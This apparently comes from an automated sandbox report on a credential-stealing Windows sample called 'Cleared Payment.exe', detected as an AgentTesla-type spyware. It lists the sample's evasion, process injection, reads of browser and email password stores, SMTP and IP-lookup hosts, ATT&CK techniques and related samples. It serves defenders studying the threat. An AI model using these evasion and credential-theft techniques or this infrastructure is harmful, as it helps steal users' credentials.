                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Cleared Payment.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 2530000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 2570000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 4570000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 89D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 99D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 2BC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 2D80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: 4E80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Cleared Payment.exe; Window / User API: threadDelayed 587
Source: C:\Users\user\Desktop\Cleared Payment.exe; Window / User API: threadDelayed 2999
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 1464; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 5948; Thread sleep count: 587 > 30
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 5948; Thread sleep count: 2999 > 30
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99188s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98969s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98844s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98735s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98610s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98485s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98360s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98235s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -98100s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -97985s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Cleared Payment.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Cleared Payment.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Cleared Payment.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99875
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99765
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99656
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99547
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99422
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99313
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99188
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 99078
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98969
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98844
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98735
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98610
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98485
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98360
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98235
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 98100
Source: C:\Users\user\Desktop\Cleared Payment.exe; Thread delayed: delay time: 97985
Source: Cleared Payment.exe, 00000004.00000002.3324266418.00000000010A4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Cleared Payment.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Cleared Payment.exe; Memory written: C:\Users\user\Desktop\Cleared Payment.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Cleared Payment.exe; Process created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Users\user\Desktop\Cleared Payment.exe VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Cleared Payment.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR
Source: C:\Users\user\Desktop\Cleared Payment.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Cleared Payment.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Cleared Payment.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Cleared Payment.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Cleared Payment.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Cleared Payment.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Cleared Payment.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a numeric prefix is the signature count the report shows for that technique)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
• Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
• Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 111 Process Injection
• Credential Access: 1 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
• Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
• Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
• Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label | Link
Cleared Payment.exe | 74% | ReversingLabs | Win32.Spyware.Negasteal |
Cleared Payment.exe | 62% | Virustotal | | Browse
Cleared Payment.exe | 100% | Avira | TR/AD.GenSteal.haobg |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
smtp.italiacanda-it.com | 4% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://smtp.italiacanda-it.com | 4% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.223 | true | false | | high
api.ipify.org | 104.26.13.205 | true | false | | high
smtp.italiacanda-it.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://smtp.italiacanda-it.com | Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.ipify.org/t | Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://us2.smtp.mailhostbox.com | Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.91.199.223 | us2.smtp.mailhostbox.com | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
104.26.13.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1427197
                                      Start date and time:2024-04-17 08:35:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 46s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Cleared Payment.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 84
                                      • Number of non-executed functions: 5
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:35:54 | API Interceptor | 20x Sleep call for process: Cleared Payment.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.91.199.223 | ReInquiry Lenght Error.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | Transmiison Remit.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | MT103 .exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | New Order 0048757.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | SecuriteInfo.com.Win32.TrojanX-gen.19751.7678.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | Po094847 Urgent .exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | PO_10042024.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | cgprgRztWc.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | 6P8VytD7wo.exe | Get hash | malicious | AgentTesla | Browse |
208.91.199.223 | FedEx Invoice.exe | Get hash | malicious | AgentTesla | Browse |
104.26.13.205 | SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe | Get hash | malicious | PureLog Stealer, Targeted Ransomware | Browse | api.ipify.org/
104.26.13.205 | Sky-Beta-Setup.exe | Get hash | malicious | Stealit | Browse | api.ipify.org/?format=json
104.26.13.205 | ArenaWarSetup.exe | Get hash | malicious | Stealit | Browse | api.ipify.org/?format=json
104.26.13.205 | Sky-Beta Setup 1.0.0.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/?format=json
104.26.13.205 | E4sbo4F6Sz.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.13.205 | E4sbo4F6Sz.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe | Get hash | malicious | PureLog Stealer, Targeted Ransomware | Browse | api.ipify.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
us2.smtp.mailhostbox.com | Quote.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | Quotation 0048484.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | Fsd5TmAZfy.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
us2.smtp.mailhostbox.com | MV SUN OCEAN BUNKER INV.doc | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | ReInquiry Lenght Error.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
us2.smtp.mailhostbox.com | ES502900012.pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
us2.smtp.mailhostbox.com | April 2024 order Pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
us2.smtp.mailhostbox.com | TT Invoice copy.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.91.198.143
us2.smtp.mailhostbox.com | MT103.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.91.198.143
us2.smtp.mailhostbox.com | SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
api.ipify.org | SAMPLE PURCHASE ORDER.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | Eaton PO-45150292964.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
api.ipify.org | 45brrQrxwH.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | Quotation 0048484.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | msXkgFIUyS.rtf | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | remittance payment of invoice DMWW24009.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | NOA, BL and invoice.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | https://worker-royal-sun-1090.nipocas604.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse | 172.67.74.152
api.ipify.org | z158xIuvhauCQiddTe.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
api.ipify.org | z34PDnVzyEItkXaInw.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | SAMPLE PURCHASE ORDER.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
CLOUDFLARENETUS | http://139.144.214.53/5nXpDw325kdXA19thlgqqvurf31CSRUYYRTWNTDQNU30935IYSS28p9 | Get hash | malicious | Phisher | Browse | 104.21.54.167
CLOUDFLARENETUS | https://theredhendc.com | Get hash | malicious | Unknown | Browse | 104.18.11.207
CLOUDFLARENETUS | Eaton PO-45150292964.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
CLOUDFLARENETUS | hcjt7Ajt5t.exe | Get hash | malicious | LummaC | Browse | 172.67.217.241
CLOUDFLARENETUS | 45brrQrxwH.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
CLOUDFLARENETUS | Quotation 0048484.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
CLOUDFLARENETUS | 3otr19d5Oq.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 104.21.77.31
CLOUDFLARENETUS | msXkgFIUyS.rtf | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
CLOUDFLARENETUS | http://bookstopbuzz.com | Get hash | malicious | Unknown | Browse | 23.227.38.65
PUBLIC-DOMAIN-REGISTRYUS | Quote.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | Quotation 0048484.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Get hash | malicious | AgentTesla | Browse | 162.222.226.100
PUBLIC-DOMAIN-REGISTRYUS | Fsd5TmAZfy.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | SHIPPING ORDER.exe | Get hash | malicious | AgentTesla | Browse | 162.222.226.100
PUBLIC-DOMAIN-REGISTRYUS | MV SUN OCEAN BUNKER INV.doc | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | ReInquiry Lenght Error.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | ES502900012.pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | April 2024 order Pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
